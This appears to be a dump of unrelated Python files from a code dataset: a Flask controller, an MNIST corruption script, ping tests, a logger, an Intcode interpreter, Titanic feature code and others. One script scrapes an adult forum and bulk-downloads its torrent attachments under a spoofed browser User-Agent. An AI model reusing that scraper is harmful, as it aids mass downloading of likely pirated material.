fieldnames=cols)\n if not file_exists or test:\n writer.writeheader()\n writer.writerow(data)\n except IOError:\n log.error('Failed to open csv file')\n except TypeError:\n log.error('Bad mode in csv files')\n except Exception as e:\n log.error('Something unexpected happened')\n log.error(e)\n else:\n log.info('Data inserted to CSV')\n return True\n return False\n\ndef export_model(test, config, log):\n ''' export the model so it can be downloaded '''\n path = config.get('path', './data')\n try:\n training_data = read_csv('/'.join((path, test, 'train.csv')))\n test_data = read_csv('/'.join((path, test, 'test.csv')))\n rfc = make_model(path, test_data, training_data, test, config, log)\n if rfc:\n try:\n model_dump = pdumps(rfc)\n return model_dump\n except:\n log.error('Failed to export the model')\n else:\n log.error('Failed to generate the model')\n return '{}'\n except ValueError:\n log.error('failed to pull data to train the model') \n return '{}'\n","sub_path":"app/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"207889242","text":"import caffe\nimport lmdb\nimport numpy as np\nimport cv2\nimport io\nimport os\nimport numpy as np\n\nclass MNISTcorrupter(object):\n \n def __init__(self, src_lmdb_dir, dst_lmdb_dir, N_im, batch_size, set_str, dir_str, angles, N_pix_corrupt):\n self.src_lmdb_dir = src_lmdb_dir\n self.dst_lmdb_dir = dst_lmdb_dir\n self.set_str = set_str\n self.dir_str = dir_str\n self.NUM_IDX_DIGITS = 10\n self.IDX_FMT = '{:0>%d' % self.NUM_IDX_DIGITS + 'd}' \n self.MAP_SZ = int(1e12)\n self.N_im = N_im #Size of images used from MNIST\n self.batch_size = batch_size\n self.angles = angles\n self.N_pix_corrupt = N_pix_corrupt\n self.n_angles = len(angles)\n\n @staticmethod \n def rotate_image(im, angle):\n rows,cols = im.shape\n M = cv2.getRotationMatrix2D((cols/2,rows/2),angle,1)\n return cv2.warpAffine(im,M,(cols,rows))\n\n \n @staticmethod\n def corrupt_image(im, N_pix_corrupt):\n rows,cols = im.shape\n randint = np.random.choice(int(rows*cols), N_pix_corrupt, replace=False)\n im2 = np.copy(im.flatten())\n im2[randint] = 0.\n return randint, im2.reshape((rows,cols))\n\n def shuffle_samples_lmdb(self,path_lmdb, path_dst, keys):\n \"\"\"\n Copy select samples from an lmdb into another.\n Can be used for sampling from an lmdb into another and generating a random shuffle\n of lmdb content.\n\n Parameters:\n path_lmdb -- source lmdb\n path_dst -- destination lmdb\n keys -- list of keys or indices to sample from source lmdb\n \"\"\"\n\n db = lmdb.open(path_dst, map_size=self.MAP_SZ)\n key_dst = 0\n with db.begin(write=True) as txn_dst:\n with lmdb.open(path_lmdb, readonly=True).begin() as txn_src: \n for key_src in keys:\n ########################\n if not isinstance(key_src, basestring):\n key_src = self.IDX_FMT.format(key_src)\n txn_dst.put(self.IDX_FMT.format(key_dst), txn_src.get(key_src))\n key_dst += 1\n\n\n ########################\n\n #if not isinstance(key_src, basestring):\n # key_src = IDX_FMT.format(key_src)\n # \n #datum_from = caffe.proto.caffe_pb2.Datum()#\n\n # datum_from.ParseFromString(txn_src.get(key_src))\n\n # datum_to = caffe.proto.caffe_pb2.Datum()\n # datum_to.label = datum_from.label\n # datum_to.data = datum_from.data\n\n #txn_dst.put(IDX_FMT.format(key_dst), datum_to.SerializeToString())\n #key_dst += 1\n # if key_dst ==5:\n # break\n db.close()\n\n \n def create_shuffled_ind(self, lmdb_dir, txt_save_dir):\n db = lmdb.open(lmdb_dir)\n N_im = db.stat()['entries']\n ind = range(N_im)\n print('Indices created', N_im)\n np.random.shuffle(ind)\n keys_shuffled = [self.IDX_FMT.format(i) for i in ind]\n\n import json\n if not os.path.exists(txt_save_dir):\n os.makedirs(txt_save_dir)\n\n f = open(txt_save_dir + '/indices_list.txt', 'w')\n json.dump(keys_shuffled, f)\n f.close()\n return ind\n\n def load_N_MNIST_images(self, N, path):\n #path = '/mnt/antares_raid/home/oliver/adhara/src/caffe/examples/mnist/mnist_train_lmdb'\n lmdb_env = lmdb.open(path)\n lmdb_txn = lmdb_env.begin()\n lmdb_cursor = lmdb_txn.cursor()\n datum_db = caffe.proto.caffe_pb2.Datum()\n I = []\n Label = []\n im_count = 0\n for key, value in lmdb_cursor:\n datum_db.ParseFromString(value)\n label = datum_db.label\n data = caffe.io.datum_to_array(datum_db)\n im = data.astype(np.uint8)\n im = np.transpose(im, (2, 1, 0)) # original (dim, col, row)\n I.append(im.squeeze())\n Label.append(datum_db.label)\n im_count = im_count + 1\n\n if im_count >= N:\n break\n return I, Label\n \n \n def run(self,*args):\n set_st = self.set_str + str(self.N_im) + '_corrupt_px_%i_'%self.N_pix_corrupt \n\n #Create angles\n\n #Load MNIST Database\n IMG, LABEL = self.load_N_MNIST_images(self.N_im, self.src_lmdb_dir + 'mnist' + self.dir_str + 'lmdb')\n # N_im = db.stat()['entries']\n\n\n #N_im = lmdb_env.stat()['entries']\n N = np.dot(np.shape(self.angles),self.N_im)\n N = N[0]\n\n\n map_size = N*28*28*100\n\n rot_angs = np.zeros(N)\n im_count = 0\n #Looping over batches\n for idx in range(int(np.ceil(N/self.batch_size))):\n count = 0\n env_randint = lmdb.open(self.dst_lmdb_dir + 'MNIST' + set_st + 'randint_lmdb/', map_size=map_size)\n env_rot = lmdb.open(self.dst_lmdb_dir + 'MNIST' + set_st + 'rot_lmdb/', map_size=map_size)\n env_rot_ang = lmdb.open(self.dst_lmdb_dir + 'MNIST' + set_st + 'rot_ang_lmdb/',map_size=int(1e12))\n env_unrot = lmdb.open(self.dst_lmdb_dir + 'MNIST' + set_st + 'unrot_lmdb/',map_size=map_size)\n env_unrot_corrupted = lmdb.open(self.dst_lmdb_dir + 'MNIST' + set_st + 'corrupted_unrot_lmdb/',map_size=map_size)\n\n with env_rot.begin(write=True) as txn: \n with env_randint.begin(write=True) as txn_randint: \n with env_unrot.begin(write=True) as txn_unrot:\n with env_unrot_corrupted.begin(write=True) as txn_unrot_corrupted:\n with env_rot_ang.begin(write=True) as txn_rot_ang:\n # Looping over images from MNIST\n for in_, lab_ in zip(IMG[(int(self.batch_size*idx)):(int(self.batch_size*(idx+1)))], LABEL[int((self.batch_size*idx)):(int(self.batch_size*(idx+1)))]):\n im = in_\n label = lab_\n for angle in self.angles:\n #Prepare data\n X_rot = self.rotate_image(im.squeeze(), angle)\n _,X_uncrot_uncorr = self.corrupt_image(im.squeeze(), self.N_pix_corrupt)\n randint, X = self.corrupt_image(X_rot, self.N_pix_corrupt)\n X = np.reshape(X,[1,28,28])\n\n datum = caffe.io.array_to_datum(X.astype(float), label)\n # if in_idx ==1:\n # print(X.astype(float).shape)\n #datum.channels = X.shape[0]\n #datum.height = X.shape[1]\n #datum.width = X.shape[2]\n #datum.data = X.tostring() # or .tostring() if numpy < 1.9\n\n #datum.label = label\n rot_angs[count] = str(angle) # \"{0}\".format(angle)\n str_id = self.IDX_FMT.format(int(self.batch_size*self.n_angles*idx) + count)\n #if count%100==0:\n # print(str_id)\n #print(datum)\n\n # The encode is only essential in Python 3\n txn.put(str_id, datum.SerializeToString())\n txn_rot_ang.put(str_id, str(angle) )\n\n #Storing unroted images\n datum_unrot = caffe.io.array_to_datum(np.reshape(im.squeeze(),[1,28,28]).astype(float), label)\n txn_unrot.put(str_id, datum_unrot.SerializeToString()) \n \n #Storing unroted and corrupted images\n datum_unrot_uncorr = caffe.io.array_to_datum(np.reshape(X_uncrot_uncorr.squeeze(),[1,28,28]).astype(float), label)\n txn_unrot_corrupted.put(str_id, datum_unrot_uncorr.SerializeToString()) \n\n # Storing corrupted randints\n txn_randint.put(str_id, str(randint)) \n count = count + 1\n if int(self.batch_size*self.n_angles*idx + count)%10000==0:\n print('Image Nr. %i created from %s'%(int(self.batch_size*self.n_angles*idx + count),self.dir_str))\n env_rot_ang.close()\n env_unrot_corrupted.close()\n env_unrot.close()\n env_randint.close()\n env_rot.close()\n\n src_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'rot_lmdb'\n dst_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'rot_lmdb/shuffled'\n\n if args:\n import json\n with open(params[0]) as data_file: \n ind = int(json.load(data_file))\n ind = [int(i) for i in ind]\n else:\n ind = self.create_shuffled_ind(src_dir, dst_dir)\n\n self.shuffle_samples_lmdb(src_dir, dst_dir, ind)\n\n src_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'rot_ang_lmdb'\n dst_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'rot_ang_lmdb/shuffled'\n self.shuffle_samples_lmdb(src_dir, dst_dir, ind)\n\n src_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'unrot_lmdb'\n dst_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'unrot_lmdb/shuffled'\n self.shuffle_samples_lmdb(src_dir, dst_dir, ind)\n\n src_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'uncorrupt_lmdb/'\n dst_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'uncorrupt_lmdb/shuffled'\n self.shuffle_samples_lmdb(src_dir, dst_dir, ind)\n \n src_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'corrupted_unrot_lmdb/'\n dst_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'corrupted_unrot_lmdb/shuffled'\n self.shuffle_samples_lmdb(src_dir, dst_dir, ind)\n \nif __name__ == '__main__':\n transformlmdb = MNISTtransformer()\n \n \n \n","sub_path":"CorruptMNIST.py","file_name":"CorruptMNIST.py","file_ext":"py","file_size_in_byte":10594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"430636541","text":"import unittest\nimport unittest.mock as mock\nimport re\n\nfrom node.ping import Ping\n\nPING_OK_EXAMPLE = 'PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.\\n64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.037 ms\\n64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.020 ms\\n64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.066 ms\\n\\n--- 127.0.0.1 ping statistics ---\\n3 packets transmitted, 3 received, 0% packet loss, time 1998ms\\nrtt min/avg/max/mdev = 0.020/0.041/0.066/0.019 ms\\n'\nPING_KO_EXAMPLE = 'PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.\\n\\n--- 10.0.0.1 ping statistics ---\\n3 packets transmitted, 0 received, 100% packet loss, time 2016ms\\n\\n'\n\nclass TestPing(unittest.TestCase):\n\n def setUp(self):\n self.ping = Ping()\n\n # def test_ping_command(self):\n # self.ping.ping_command(\"127.0.0.1\")\n\n # def test_ping_command_failed(self):\n # print(self.ping.ping_command(\"10.0.0.1\"))\n\n def test_get_ttl_and_time(self):\n result = self.ping.get_ttl_and_time(PING_OK_EXAMPLE)\n expected = ([64, 64, 64], [0.037, 0.020, 0.066])\n\n self.assertEqual(result, expected)\n\n def test_get_ttl_and_time_failed(self):\n result = self.ping.get_ttl_and_time(PING_KO_EXAMPLE)\n expected = ([],[])\n\n self.assertEqual(result, expected)\n\n def test_get_statistics(self):\n result = self.ping.get_scan_statistics(PING_OK_EXAMPLE)\n expected = (3, 3, 1998)\n self.assertEqual(result, expected)\n\n def test_call(self):\n ping_command = mock.Mock(return_value=PING_OK_EXAMPLE)\n parameters = {\"ip\":\"127.0.0.1\"}\n result = self.ping(parameters, ping_command)\n expected = {\n 'packet_transmitted': 3, \n 'packet_received': 3,\n 'scan_time': 1998, \n 'ttl': [64, 64, 64], \n 'time': [0.037, 0.02, 0.066]\n }\n self.assertEqual(result, expected)\n\n\n \n","sub_path":"tests/test_ping.py","file_name":"test_ping.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"441858383","text":"from flask_testing import TestCase\nfrom app import app, db\n\nclass BaseTestCase(TestCase):\n\n def create_app(self):\n app.config.from_object('flask_config.TestsConfiguration')\n return app\n\n def setUp(self):\n db.create_all()\n self.db = db\n self.app_context = app.app_context()\n self.app_context.push()\n self.client = app.test_client()\n\n\n def tearDown(self):\n del self.client\n del self.db\n self.app_context.pop()\n db.session.remove()\n db.drop_all()","sub_path":"app/app_tests/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"422816803","text":"import logging\n\n\ndef create_logger(script_name):\n logger = logging.getLogger(script_name)\n logger.setLevel(logging.DEBUG)\n log_path = script_name.replace('.py', '.log')\n segments = log_path.split('/')\n segments.insert(-1, '../log')\n log_path = '/'.join(segments)\n # create file handler\n fh = logging.FileHandler(log_path)\n fh.setLevel(logging.INFO)\n\n # create formatter\n fmt = \"%(asctime)-15s %(levelname)s %(filename)s %(lineno)d %(process)d %(message)s\"\n datefmt = \"%a %d %b %Y %H:%M:%S\"\n formatter = logging.Formatter(fmt, datefmt)\n\n # add handler and formatter to logger\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n return logger\n","sub_path":"utils/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"518088631","text":"#Longest Substring Without Repeating Characters\nstr = input(\"Enter the string\\n\")\ndef findLongestSubstring(str) :\n #creating dictionary which will tract character and its index as key value pair\n dict = {}\n str_longest_Substring = \"\"\n str_check = \"\"\n i = 0\n while i < len(str) :\n #checking is character is presnt in our dictionary\n if str[i] in dict.keys() :\n i = dict[str[i]]\n dict.clear()\n str_check = \"\"\n else :\n dict[str[i]] = i\n str_check = str_check + str[i]\n if len(str_check) > len(str_longest_Substring) :\n str_longest_Substring = str_check \n i+=1\n print(str_longest_Substring)\nfindLongestSubstring(str)","sub_path":"String/longestPallindrome.py","file_name":"longestPallindrome.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"15083676","text":"\"\"\"Script to skeletonize segments. Takes in two command line arguments:\n * Input filename: This must be a numpy .npy file\n * Output filename: This will be another .npy file\n\nUses scikit's skeletonize_3d function\n\nWe assume that the segment ID that occurs most frequently in the volume belongs to \nthe segment that has the largest volume.\n\"\"\"\n\nimport sys\nimport numpy\nimport matplotlib.pyplot as plt\nfrom skimage.morphology import skeletonize_3d\n\nNUM_SEGS = 1 #Number of largest segments to skeletonize\nMEMBRANE_ID = 2081\n\ndef skeletonize_volume(in_file, out_file):\n print(\"Loading segments from input file...\")\n input_segments = numpy.load(in_file)\n (zdim, ydim, xdim) = input_segments.shape\n single_segment = numpy.zeros((zdim, ydim, xdim), dtype='uint8') #Arrays to store results\n skeletonized = numpy.zeros((zdim, ydim, xdim), dtype='uint8')\n segments = numpy.zeros((zdim, ydim, xdim), dtype='uint8')\n print(\"Getting most frequent segment IDs...\")\n (seg_ids, counts) = numpy.unique(input_segments, return_counts=True) #Get segment IDs and their counts\n #Cell membrane is invariably one of the largest classes, so we will hae one more \"segment\" that we'd like\n sorted_count_indices = numpy.argpartition(counts, -(NUM_SEGS+1))[-(NUM_SEGS+1):] #This returns the seg_ids array indices of the IDs of the NUM_SEGS largest segments \n largest_segs = seg_ids[sorted_count_indices] #Get the seg IDs of the NUM_SEGS largest segments\n descending_segs = largest_segs[numpy.argsort(-largest_segs)] #Sort in descending order to get the largest segment first\n count = 0\n for idx in descending_segs:\n if idx != MEMBRANE_ID: #Skip cell membrane\n count += 1\n print(\"Skeletonizing segment ID \" + str(idx) + \", \" + str(count) + \" out of \" + str(NUM_SEGS) + \"...\")\n for z in range(zdim):\n for y in range(ydim):\n for x in range(xdim):\n if input_segments[z, y, x] == idx:\n single_segment[z, y, x] = 1 #Convert to binary image\n single_segment_skeletonized = skeletonize_3d(single_segment) #Skeletonize single segment\n segments = numpy.add(segments, single_segment) #Merge entire segments, not skeletonized\n skeletonized = numpy.add(single_segment_skeletonized, skeletonized) #Merge current segment skeleton with other segment skeletons\n single_segment = numpy.zeros((zdim, ydim, xdim), dtype='uint8') #Reinitialize single segment array\n #plt.imshow(single_segment[12, :, :], cmap='gray')\n #plt.show()\n numpy.save(out_file, skeletonized)\n numpy.save(\"full_segments.npy\", segments) #Save full segments without skeletonization\n #plt.imshow(skeletonized[12, :, :], cmap='gray')\n #plt.show()\n\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n raise RuntimeError(\"Usage: python skeletonize_segments.py \")\n \n in_file = sys.argv[1]\n out_file = sys.argv[2]\n \n skeletonize_volume(in_file, out_file)\n\n\n","sub_path":"skeletonize/skeletonize_largest_segment.py","file_name":"skeletonize_largest_segment.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"636340315","text":"#\r\n# Copyright 2016 Practical VR.\r\n# All rights reserved.\r\n\r\nimport queue\r\nimport threading\r\nfrom threading import Thread\r\n\r\nfrom common.logging import LOG\r\nfrom common.resources import data_queue\r\n\r\nclass EventDispatcherThread(Thread):\r\n\r\n def __init__(self):\r\n Thread.__init__(self)\r\n self._queue = data_queue.DataQueue()\r\n self._lock = threading.Lock()\r\n LOG.debug(\"Event dispatcher initialized!\")\r\n\r\n def add_event(self, event):\r\n \"\"\"\r\n Register an event\r\n :param event:\r\n :return:\r\n \"\"\"\r\n if self._queue is None:\r\n return\r\n\r\n # Queue the event...\r\n self._queue.enqueue(event)\r\n\r\n def run(self):\r\n if self._queue is None:\r\n LOG.error(\"event dispatcher was not properly initialized\")\r\n return\r\n\r\n while True:\r\n try:\r\n event = self._queue.dequeue(blocking=True)\r\n if event.isLastEvent():\r\n self._queue.task_done()\r\n break\r\n LOG.info (\"[[Dispatching event]]\" + str(event.get_type()))\r\n event.handle()\r\n self._queue.task_done()\r\n except queue.Empty:\r\n pass\r\n\r\n with self._lock:\r\n print(\"[[locking]]\")\r\n","sub_path":"common/resources/event_dispatcher.py","file_name":"event_dispatcher.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"107088063","text":"import sys\nimport os\nfrom workflow import Workflow\n\ndef main(wf):\n args = wf.args\n\n # parse the first arg\n op = args[0]\n\n if op == 'add':\n try:\n cur = args[1].lower()\n except:\n return wait(m=\"Please give a valid currency type\")\n\n if not is_valid_cur(cur):\n return wait(m=\"{0} isn't a valid currency type\".format(cur))\n\n iterator = [cur] if op == 'add' else wf.settings['defaults']['cur_types']\n\n for c in iterator:\n title = '{0} {1}'.format(op.capitalize(), c.upper())\n subtitle = 'Press enter to proceed'\n arg = '{0} {1}'.format(op, c)\n icon = './assets/flags/{0}.png'.format(c)\n\n wf.add_item(title=title, subtitle=subtitle, icon=icon, arg=arg, valid=True)\n\n wf.send_feedback()\n\ndef wait(m):\n wf.add_item(title=m)\n wf.send_feedback()\n\ndef is_valid_cur(cur):\n return cur in wf.settings['defaults']['rate']\n\nif __name__ == '__main__':\n wf = Workflow()\n sys.exit(wf.run(main))\n","sub_path":"manage_currency.py","file_name":"manage_currency.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"476337876","text":"# -*- coding: UTF-8 -*-\nimport os\n\ndef change_num_to_fill(file_path, zerofill):\n '''\n 将原始的文件名称由0,1,2,...,399变为00000,00001, ..., 00399,这种位数填充形式\n :param file_path: 文件路径\n :param zerofill: 填充位数\n :return:\n '''\n file_list = os.listdir(file_path)\n for file in file_list:\n old_filename = file_path + '/' + file\n file_name = file.split('.')[0]\n file_num = int(file_name)\n s = str(file_num)\n st = s.zfill(zerofill) # 这里的数字为名称的总数位,比如000000递增就是6\n new_filename = file_path + '/' + st + '.' + file.split('.')[-1]\n # 用os模块中的rename方法对文件改名\n os.rename(old_filename, new_filename)\n\ndef zip_convert(file_path, zerofill, begin_num):\n '''\n 把一个以数字类型命名的文件名称改成n位填充的命名方式\n :param file_path: 需要更改名称的文件路径\n :param begin_num: 开始编号,从此编号开始顺序改变名称\n :param zerofill: 填充位数\n :return: 在原始的文件夹内更改文件名\n '''\n file_list = os.listdir(file_path)\n for file in file_list:\n old_filename = file_path + '/' + file\n #设置新文件名\n #s = str(n + 1)\n s=str(begin_num)\n st=s.zfill(zerofill) #这里的数字为名称的总数位,比如000000递增就是6\n new_filename = file_path + '/' + st + '.' + file.split('.')[-1]\n #用os模块中的rename方法对文件改名\n os.rename(old_filename, new_filename)\n begin_num += 1\n\nif __name__ == '__main__':\n file_path = r'F:\\post_graduate_design\\postgraduate_continue\\little_target_new\\labelled_data_jpg\\ragged'\n zerofill = 7\n begin_num = 0\n # change_num_to_fill(file_path, zerofill)\n zip_convert(file_path, zerofill + 1, begin_num)\n zip_convert(file_path, zerofill, begin_num)\n","sub_path":"image_operation/change_number.py","file_name":"change_number.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"540239246","text":"# download torrent files\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport os\nimport time\nimport random\n\nheaders = {'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}\n\nfor id in range(1,500):\n # 143 亚洲成人无码原创区\n # 25 亚洲无码区\n # 230 亚洲成人有码原创区\n # 229 欧美成人无码原创区\n response = requests.get(f'http://www.sexinsex.net/bbs/forum-229-{id}.html', headers = headers)\n print(response)\n soup = BeautifulSoup(response.content, 'html.parser')\n ths = soup.find_all('th', class_='new')\n \n for th in ths:\n link = th.find('span').find('a')['href']\n print(link)\n link_response = requests.get(f'http://www.sexinsex.net/bbs/{link}', headers = headers)\n link_soup = BeautifulSoup(link_response.content, 'html.parser')\n attachment = link_soup.find('dl', class_='t_attachlist').find('a')['href']\n attachment_name = link_soup.find('dl', class_='t_attachlist').find('a').string\n response = requests.get(f'http://www.sexinsex.net/bbs/{attachment}', headers = headers)\n open(f\"D:/Media/torrent/{attachment_name}\", 'wb').write(response.content)\n","sub_path":"scrape images/sexinsex3 torrent.py","file_name":"sexinsex3 torrent.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"98256227","text":"# The Factorial of a positive integer, n, is defined as the product of the sequence n, n-1, n-2, ...1 and the factorial of zero, 0, is defined as being 1. Solve this using both loops and recursion.\n# recursion\ndef factoral(x):\n if x == 1:\n return 1\n else:\n return x*factoral(x-1)\nprint(factoral(5))\n# loops\ndef factorial(x):\n sum = 1\n while x >= 1:\n sum = sum * x\n x = x-1\n return sum\nprint(factorial(5))\n","sub_path":"Numbers/Factorial_Finder.py","file_name":"Factorial_Finder.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"230771299","text":"#!/usr/bin/env python3\n\nimport argparse\nimport sys\n\n# General day 2 stuff\n\nclass IntCode(object):\n\n INSTR_ZERO= set([99])\n INSTR_ONE = set([3, 4, 9])\n INSTR_TWO = set([5, 6])\n INSTR_THREE= set([1, 2, 7, 8])\n\n def __init__(self, size):\n self.memory = [0] * size\n self.relative_offset = 0\n self.program_counter = 0\n self.cycle_counter = 0\n self.steps = -1\n\n def instr_args(self, instr):\n \"\"\"returns the number of arguments for a given instruction\"\"\"\n if instr in IntCode.INSTR_ZERO:\n return 0\n elif instr in IntCode.INSTR_ONE:\n return 1\n elif instr in IntCode.INSTR_TWO:\n return 2\n elif instr in IntCode.INSTR_THREE:\n return 3\n else:\n raise Exception(\"Illegal instruction: %s\" % str(instr))\n\n def decode_modes(self, instr):\n return ((instr // 10000) % 10,\n (instr // 1000) % 10,\n (instr // 100) % 10,\n (instr % 100))\n\n def exec(self):\n pc = self.program_counter\n pinstr = self.memory[pc]\n # Not all modes may be applicable, they're fetched anyway.\n mode2, mode1, mode0, instr = self.decode_modes(pinstr)\n argc = self.instr_args(instr)\n args = self.memory[pc + 1:pc + 1 + argc]\n \n self.cycle_counter += 1\n # Jumps reset this later.\n self.program_counter += argc + 1\n if instr == 1:\n self.mem(args[2], mode2,\n val=self.mem(args[0], mode0) + self.mem(args[1], mode1))\n elif instr == 2:\n self.mem(args[2], mode2,\n val=self.mem(args[0], mode0) * self.mem(args[1], mode1))\n elif instr == 3:\n self.mem(args[0], mode0, val=int(input(\"\")))\n #raise Exception(\"not implemented\")\n elif instr == 4:\n print(self.mem(args[0], mode0))\n #raise Exception(\"not implemented\")\n elif instr == 5:\n if self.mem(args[0], mode0) != 0:\n # we increment program counter later.\n self.program_counter = self.mem(args[1], mode1)\n elif instr == 6:\n if self.mem(args[0], mode0) == 0:\n # we increment program counter later.\n self.program_counter = self.mem(args[1], mode1)\n elif instr == 7:\n self.mem(args[2], mode2,\n val=int(self.mem(args[0], mode0) < self.mem(args[1], mode1)))\n elif instr == 8:\n self.mem(args[2], mode2,\n val=int(self.mem(args[0], mode0) == self.mem(args[1], mode1)))\n elif instr == 9:\n self.relative_offset += self.mem(args[0], mode0)\n elif instr == 99:\n return \"exit\"\n else:\n raise Exception(\"invalid instruction: %s at index: \" % (str(instr), self.program_counter))\n return None\n\n def run(self):\n out = None\n while True:\n if out == \"exit\" or self.steps == self.cycle_counter:\n break\n out = self.exec()\n print(\"exiting...\")\n\n def mem(self, arg, mode, *, val=None):\n if mode not in [0, 1, 2]:\n raise Exception(\"bad mode: %s\" % mode)\n if val is not None:\n # data write\n if mode == 0:\n self.memory[arg] = val\n elif mode == 1:\n raise Exception(\"illegal mode for write: %s\" % mode)\n elif mode == 2:\n self.memory[arg + self.relative_offset] = val\n else:\n if mode == 0:\n return self.memory[arg]\n elif mode == 1:\n return arg\n elif mode == 2:\n return self.memory[arg + self.relative_offset]\n\n\ndef load(f):\n contents = []\n for line in f:\n contents.extend(line.split(','))\n return [ int(i) for i in contents ]\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('input', type=argparse.FileType('r'), nargs='?', default=sys.stdin)\n parser.add_argument('--steps', default=None, type=int)\n\n args = parser.parse_args(sys.argv[1:])\n\n ic = IntCode(0)\n ic.steps = args.steps\n ic.memory = load(args.input) + [0] * 4096\n\n ic.run()\n\n print(\"cycles:\", ic.cycle_counter)\n print(\"first mem:\", ic.memory[0])\n\n","sub_path":"2019/day-09/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"6337764","text":"import math\n\nfrom keras.layers.core import Dense\nfrom keras.models import Sequential\n\nimport torch.nn.functional as F\nfrom torch import nn\n\n\ndef translate_honorific_title(train_df, test_df):\n #######################################\n # name => honorific title\n #######################################\n train_values = []\n test_values = []\n for i, val in enumerate(train_df['Name'].to_numpy()):\n title = val.split(',')[1].split('.')[0].strip()\n if title in ['Mr', 'Mrs', 'Miss', 'Master']:\n train_values.append(title)\n else:\n train_values.append('Other')\n for i, val in enumerate(test_df['Name'].to_numpy()):\n title = val.split(',')[1].split('.')[0].strip()\n if title in ['Mr', 'Mrs', 'Miss', 'Master']:\n test_values.append(title)\n else:\n test_values.append('Other')\n train_df['HonorificTitle'] = train_values\n test_df['HonorificTitle'] = test_values\n return train_df, test_df\n\n\ndef translate_age(train_df, test_df):\n #######################################\n # no age => mean grouped Mr, Mrs, Miss\n #######################################\n # get honorific title => age mean\n t2m = {}\n tmp = train_df.groupby('HonorificTitle')['Age']\n for key in tmp.indices.keys():\n t2m[key] = tmp.mean()[key]\n # age range\n for df in [train_df, test_df]:\n for i, val in enumerate(df['Age'].to_numpy()):\n if math.isnan(val):\n df['Age'].to_numpy()[i] = \\\n t2m[df['HonorificTitle'].to_numpy()[i]]\n return train_df, test_df\n\n\ndef translate_fare(train_df, test_df):\n #######################################\n # no fare => mean grouped by pclass\n #######################################\n for df in [train_df, test_df]:\n for i, val in enumerate(df['Fare'].to_numpy()):\n if math.isnan(val):\n df['Fare'].to_numpy()[i] = \\\n train_df.groupby('Pclass')['Fare'].mean()[\n df['Pclass'].to_numpy()[i]]\n return train_df, test_df\n\n\ndef translate_familystatus(train_df, test_df):\n #######################################\n # sibsp + parch == 0 => no family(0)\n # survive vs no survive in same familyname\n # => more survive(1) or less survive(2)\n # delete sibsp, parch\n # categorize after\n #######################################\n # get family name\n train_df['FamilyName'] = [''] * len(train_df['Name'].to_numpy())\n for i, val in enumerate(train_df['Name'].to_numpy()):\n train_df['FamilyName'].to_numpy()[i] = val.split(',')[0]\n # get family name => family status\n n2s = {}\n tmp = train_df.groupby('FamilyName')['Survived']\n for key in tmp.indices.keys():\n survived_num = tmp.sum()[key]\n no_survived_num = tmp.count()[key] - survived_num\n if survived_num > no_survived_num:\n n2s[key] = 1\n else:\n n2s[key] = 2\n # main\n for df in [train_df, test_df]:\n df['FamilyStatus'] = [0] * len(df['Name'].to_numpy())\n for i, val in enumerate(df['Name'].to_numpy()):\n family_name = val.split(',')[0]\n # no family\n if df['SibSp'].to_numpy()[i] + df['Parch'].to_numpy()[i] == 0:\n continue\n # any family\n if family_name in n2s:\n df['FamilyStatus'].to_numpy()[i] = n2s[family_name]\n # del sibsp, parch\n del df['SibSp']\n del df['Parch']\n # del family name\n del train_df['FamilyName']\n return train_df, test_df\n\n\ndef _create_nn_model():\n input_dim = 7\n activation = 'relu'\n output_dim = 2\n optimizer = 'adam'\n\n model = Sequential()\n model.add(Dense(10, input_dim=input_dim, activation=activation))\n model.add(Dense(10, 